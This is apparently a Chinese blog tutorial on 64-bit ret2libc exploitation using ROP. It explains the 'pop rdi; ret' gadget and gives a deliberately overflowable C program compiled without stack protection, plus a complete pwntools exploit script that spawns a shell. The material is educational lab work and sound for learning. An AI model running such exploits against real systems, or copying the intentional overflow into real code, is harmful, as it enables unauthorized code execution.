上回弄了个32位的NX机制及策略-Ret2libc,这次弄一个64位的
将代码在x64平台上编译运行,不同于x86,x64平台前六个整型或指针参数依次保存在
RDI, RSI, RDX, RCX, R8和R9
寄存器里,如果还有更多的参数的话才会保存在栈上
也就是说按之前的想法调用system
函数,参数是/bin/sh
的话,我们要想办法在栈布局时,先将/bin/sh
传给rdi
寄存器,再调用sytem
函数
一,ROP
ROP(Return Oriented Programming)
即面向返回地址编程,其主要思想是在栈缓冲区溢出的基础上,通过利用程序中已有的小片段(gadgets
)来改变某些寄存器或者变量的值,从而改变程序的执行流程,达到预期利用目的。
1.假设现有一个存在有栈溢出漏洞的栈空间布局如下:
2.我们通过布局,改变为:
①gadget_addr
指向的是程序中可以利用的小片段代码,这里使用的是pop rdi ; ret ;
对于这种搜索,我们可以使用一个工具:ROPgadget
安装
$ git clone -b master git@github.com:JonathanSalwan/ROPgadget.git
$ cd ROPgadget
$ cd ./dependencies/capstone-next
$ ./make.sh
$ sudo ./make.sh install
$ cd ./bindings/python
$ make
$ sudo make install
②bin_sh_addr
指向的是字符串参数:'/bin/sh'
③system_addr
则指向system
函数
3.布局说明
①当程序运行到gadget_add
r时(rsp
指向gadget_addr
),接下来会跳转到小片段里执行命令,同时rsp+8
(rsp
指向bin_sh_addr
)
②然后执行pop rdi
,将bin_sh_addr
弹入rdi
寄存器中,同时rsp + 8
(rsp
指向system_addr
)
③执行return
指令,因为这时rsp
是指向system_addr
的,这时就会调用system
函数,而参数是通过rdi
传递的,也就是会将/bin/sh
传入,从而实现调用system('/bin/sh')
二,测试
1,源码
文件名:StackOF.c
#include <stdio.h>
#include <string.h>
void vul(char *msg)
{
char buffer[64];
memcpy(buffer,msg,128);
return;
}
int main()
{
puts("So plz give me your shellcode:");
char buffer[256];
memset(buffer,0,256);
read(0,buffer,256);
vul(buffer);
return 0;
}
2.编译
gcc -g -ggdb -fno-stack-protector -no-pie StackOF.c -o pwnme
3.查看属性及保护措施
64位文件,NX开启
4.查看加载的libc
文件及地址
ldd pwnme
得到
libc
版本为:libc.so.6
libc
的加载地址libc_base = x00007ffff7dee000
同时将
libc.so.6
拷贝到pwnme
同级目录
cp /lib/x86_64-linux-gnu/libc.so.6 你的目录
5.代码
文件名:exp.py
from pwn import *
p = process('./pwnme')
p.recvuntil("shellcode:")
elf = ELF('libc.so.6')
system_in_libc = elf.symbols['system'] #system在libc文件里的偏移地址
#print hex(system_in_libc)
bin_sh_in_libc = next(elf.search('/bin/sh')) #/'bin/sh'字符串在libc里的偏移地址
#print hex(bin_sh_in_libc)
libc_base = 0x00007ffff7dee000 #libc加载的基址
gadget_addr = 0x0000000000401243 #搜索到的gadget片段的地址
system_addr = libc_base + system_in_libc #system在程序里的地址
bin_sh_addr = libc_base + bin_sh_in_libc #/bin/sh在程序里的地址
print hex(system_addr) +'----'+hex(bin_sh_addr)
#布局
buf = 'A'*72 #如何得到填充数据大小:https://www.jianshu.com/p/278f8d1f8322
buf += p64(gadget_addr)
buf += p64(bin_sh_addr)
buf += p64(system_addr)
with open('poc','wb') as f :
f.write(buf)
p.sendline(buf) #开始溢出
p.interactive()
6.运行
python exp.py
输入
whoami
返回root
,溢出成功!!!测试完成!!!